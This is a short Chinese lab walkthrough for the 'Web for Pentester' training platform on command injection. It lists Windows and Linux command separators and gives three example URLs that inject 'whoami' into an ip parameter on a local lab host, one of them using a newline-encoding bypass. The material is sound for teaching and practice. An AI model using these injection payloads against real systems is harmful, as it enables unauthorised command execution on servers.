【渗透测试学习平台】 web for pentester -6.命令执行

 

命令执行漏洞

windows支持:

|           ping 127.0.0.1|whoami           ||              ping  2 || whoami (哪条名令为真执行那条)

&  &&   ping 127.0.0.1&&whoami

Linux支持:

;      127.0.0.1;whoami  

|         127.0.0.1|whoami                    11    1||whoami  (哪条名令为真执行那条)

&&     127.0.0.1&&whoami

Example 1

http://192.168.106.154/commandexec/example1.php?ip=127.0.0.1;whoami

【渗透测试学习平台】 web for pentester -6.命令执行_第1张图片

Example 2

http://192.168.106.154/commandexec/example2.php?ip=127.0.0.1%0awhoami

【渗透测试学习平台】 web for pentester -6.命令执行_第2张图片

Example 3

 http://192.168.106.154/commandexec/example3.php?ip=127.0.0.1|whoami

 【渗透测试学习平台】 web for pentester -6.命令执行_第3张图片

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【渗透测试学习平台】 web for pentester -6.命令执行_第4张图片

你可能感兴趣的:(【渗透测试学习平台】 web for pentester -6.命令执行)